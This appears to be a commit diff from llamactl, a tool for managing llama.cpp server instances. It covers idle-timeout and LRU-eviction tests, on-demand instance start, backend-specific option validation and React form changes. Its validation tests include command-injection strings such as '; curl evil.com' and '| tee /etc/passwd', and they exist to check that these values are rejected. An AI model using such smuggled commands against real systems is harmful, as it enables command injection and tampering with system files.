manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}
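Note: MockTimeProvider only works because the instance package reads the clock through an injected provider (SetTimeProvider above) instead of calling time.Now directly. The exact interface is not shown in this diff; a generic sketch of the pattern, with the shape assumed purely for illustration:

	package main

	import (
		"fmt"
		"time"
	)

	// TimeProvider is assumed to expose just Now(); the real definition lives in pkg/instance.
	type TimeProvider interface {
		Now() time.Time
	}

	// realClock is the production implementation backed by the system clock.
	type realClock struct{}

	func (realClock) Now() time.Time { return time.Now() }

	// idleExpired is the kind of check that becomes deterministic once the clock is injected.
	func idleExpired(tp TimeProvider, lastRequest time.Time, idle time.Duration) bool {
		return idle > 0 && tp.Now().Sub(lastRequest) > idle
	}

	func main() {
		fmt.Println(idleExpired(realClock{}, time.Now().Add(-2*time.Minute), time.Minute)) // true
	}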

View File

@@ -272,6 +272,12 @@ func (h *Handler) StartInstance() http.HandlerFunc {
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -451,7 +457,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
@@ -574,24 +580,37 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return
}
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := inst.GetProxy()
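Note: condensed, the on-demand path above makes three decisions before proxying a request to a stopped instance: is on-demand start allowed, is there capacity (evicting the LRU instance when eviction is enabled), and did the instance become healthy in time. A hedged restatement of that flow as a standalone helper (names and signature are illustrative, not the handler's actual API; needs "fmt"):

	// ensureRunning sketches the on-demand start decision flow for a stopped instance.
	func ensureRunning(allowOnDemand, maxReached, lruEnabled bool, evict, start, waitHealthy func() error) error {
		if !allowOnDemand {
			return fmt.Errorf("instance is not running")
		}
		if maxReached {
			if !lruEnabled {
				return fmt.Errorf("maximum number of instances reached")
			}
			if err := evict(); err != nil {
				return fmt.Errorf("failed to evict instance: %w", err)
			}
		}
		if err := start(); err != nil {
			return fmt.Errorf("failed to start instance: %w", err)
		}
		return waitHealthy() // proxy only once the instance reports healthy
	}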

View File

@@ -2,6 +2,7 @@ package validation
import (
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"reflect"
"regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
return nil
}
// ValidateInstanceOptions performs validation based on backend type
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
if options == nil {
return ValidationError(fmt.Errorf("options cannot be nil"))
}
// Validate based on backend type
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
return validateLlamaCppOptions(options)
default:
return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
}
}
// validateLlamaCppOptions validates llama.cpp specific options
func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
if options.LlamaServerOptions == nil {
return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
}
// Use reflection to check all string fields for injection patterns
if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
return err
}
// Basic network validation for port
if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
}
return nil
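Note: with the switch on BackendType, adding another backend later only requires a new case plus its own validate function, and unknown types fail fast. A short usage fragment (assuming the imports used by the validation tests above; the model path is a placeholder):

	opts := &instance.CreateInstanceOptions{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/path/to/model.gguf",
			Port:  8080,
		},
	}
	if err := validation.ValidateInstanceOptions(opts); err != nil {
		log.Fatal(err)
	}

	// An options struct whose backend type is not recognized is rejected outright.
	bad := &instance.CreateInstanceOptions{}
	fmt.Println(validation.ValidateInstanceOptions(bad)) // "unsupported backend type: ..."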

View File

@@ -1,6 +1,7 @@
package validation_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: tt.port,
},
}
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Model field (string field)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: tt.value,
},
}
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
t.Run(tt.name, func(t *testing.T) {
// Test with Lora field (array field)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Lora: tt.array,
},
}
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in model field",
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
HFRepo: "microsoft/model; curl evil.com",
},
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "injection in log file",
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "safe.gguf",
LogFile: "/tmp/log.txt | tee /etc/passwd",
},
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
{
name: "all safe fields",
options: &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
HFRepo: "microsoft/DialoGPT-medium",
LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
AutoRestart: testutil.BoolPtr(true),
MaxRestarts: testutil.IntPtr(5),
RestartDelay: testutil.IntPtr(10),
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Port: 8080,
GPULayers: 32,
CtxSize: 4096,

View File

@@ -30,9 +30,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) {
void updateInstance(editingInstance.name, options);
} else {
void createInstance(name, options);
}
};

View File

@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [
{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
]
beforeEach(() => {
@@ -81,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const newInstance: Instance = {
name: 'new-test-instance',
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
}
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -105,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -118,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const updatedInstance: Instance = {
name: 'test-instance-1',
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
}
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -138,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
})
})
})

View File

@@ -0,0 +1,123 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { BackendOptions } from '@/schemas/instanceOptions'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface BackendFormFieldProps {
fieldKey: keyof BackendOptions
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
switch (fieldType) {
case 'boolean':
return (
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
{config.label}
{config.description && (
<span className="text-muted-foreground ml-1">- {config.description}</span>
)}
</Label>
</div>
)
case 'number':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
case 'array':
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={Array.isArray(value) ? value.join(', ') : ''}
onChange={(e) => {
const arrayValue = e.target.value
? e.target.value.split(',').map(s => s.trim()).filter(Boolean)
: undefined
handleChange(arrayValue)
}}
placeholder="item1, item2, item3"
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
<p className="text-xs text-muted-foreground">Separate multiple values with commas</p>
</div>
)
case 'text':
default:
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
}
return <div className="space-y-2">{renderField()}</div>
}
export default BackendFormField

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />;
case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive";
case "unknown":
return "secondary";
case "failed":
return "destructive";
}
};
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error";
case "unknown":
return "Unknown";
case "failed":
return "Failed";
}
};

View File

@@ -24,7 +24,7 @@ function InstanceCard({
editInstance,
}: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => {
startInstance(instance.name);
@@ -50,13 +50,15 @@ function InstanceCard({
setIsLogsOpen(true);
};
const running = instance.status === "running";
return (
<>
<Card>
<CardHeader className="pb-3">
<div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle>
{running && <HealthBadge health={health} />}
</div>
</CardHeader>
@@ -66,7 +68,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStart} onClick={handleStart}
disabled={instance.running} disabled={running}
title="Start instance" title="Start instance"
data-testid="start-instance-button" data-testid="start-instance-button"
> >
@@ -77,7 +79,7 @@ function InstanceCard({
size="sm" size="sm"
variant="outline" variant="outline"
onClick={handleStop} onClick={handleStop}
disabled={!instance.running} disabled={!running}
title="Stop instance" title="Stop instance"
data-testid="stop-instance-button" data-testid="stop-instance-button"
> >
@@ -108,7 +110,7 @@ function InstanceCard({
size="sm" size="sm"
variant="destructive" variant="destructive"
onClick={handleDelete} onClick={handleDelete}
disabled={instance.running} disabled={running}
title="Delete instance" title="Delete instance"
data-testid="delete-instance-button" data-testid="delete-instance-button"
> >
@@ -122,7 +124,7 @@ function InstanceCard({
open={isLogsOpen}
onOpenChange={setIsLogsOpen}
instanceName={instance.name}
isRunning={running}
/>
</>
);

View File

@@ -10,10 +10,11 @@ import {
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields, getBasicBackendFields, getAdvancedBackendFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField";
import BackendFormField from "@/components/BackendFormField";
interface InstanceDialogProps {
open: boolean;
@@ -29,7 +30,6 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance,
}) => {
const isEditing = !!instance;
const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({});
@@ -39,6 +39,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Get field lists dynamically from the type
const basicFields = getBasicFields();
const advancedFields = getAdvancedFields();
const basicBackendFields = getBasicBackendFields();
const advancedBackendFields = getAdvancedBackendFields();
// Reset form when dialog opens/closes or when instance changes
useEffect(() => {
@@ -52,6 +54,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName(""); setInstanceName("");
setFormData({ setFormData({
auto_restart: true, // Default value auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
}); });
} }
setShowAdvanced(false); // Always start with basic view setShowAdvanced(false); // Always start with basic view
@@ -66,6 +70,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
}));
};
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
backend_options: {
...prev.backend_options,
[key]: value,
},
}));
};
const handleNameChange = (name: string) => {
setInstanceName(name);
// Validate instance name
@@ -90,7 +104,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => {
if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
@@ -114,6 +145,16 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
<DialogContent className="sm:max-w-[600px] max-h-[80vh] overflow-hidden flex flex-col">
@@ -187,8 +228,9 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
(fieldKey) =>
fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay" &&
fieldKey !== "backend_options" // backend_options is handled separately
)
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
@@ -199,6 +241,21 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
))}
</div>
{/* Backend Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */}
<div className="border-t pt-4">
<Button
@@ -217,8 +274,8 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{
advancedFields.filter(
(f) =>
!["max_restarts", "restart_delay", "backend_options"].includes(f as string)
).length + advancedBackendFields.length
}{" "}
options)
</span>
@@ -228,24 +285,51 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
{/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
{/* Advanced instance fields */}
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string
)
).length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Instance Configuration</h4>
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay", "backend_options"].includes(
fieldKey as string
)
)
.sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={fieldKey === 'backend_options' ? undefined : formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
)}
{/* Advanced backend fields */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData.backend_options?.[fieldKey]}
onChange={handleBackendFieldChange}
/>
))}
</div>
)}
</div>
)}
</div>
@@ -264,11 +348,7 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
{saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>

View File

@@ -3,6 +3,7 @@ import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
@@ -23,6 +24,30 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
}
const renderField = () => {
// Special handling for backend_type field - render as dropdown
if (fieldKey === 'backend_type') {
return (
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<select
id={fieldKey}
value={typeof value === 'string' ? value : BackendType.LLAMA_CPP}
onChange={(e) => handleChange(e.target.value || undefined)}
className="flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background file:border-0 file:bg-transparent file:text-sm file:font-medium placeholder:text-muted-foreground focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50"
>
<option value={BackendType.LLAMA_CPP}>Llama Server</option>
{/* Add more backend types here as they become available */}
</select>
{config.description && (
<p className="text-sm text-muted-foreground">{config.description}</p>
)}
</div>
)
}
switch (fieldType) {
case 'boolean':
return (

View File

@@ -3,6 +3,7 @@ import { render, screen } from '@testing-library/react'
import userEvent from '@testing-library/user-event'
import InstanceCard from '@/components/InstanceCard'
import type { Instance } from '@/types/instance'
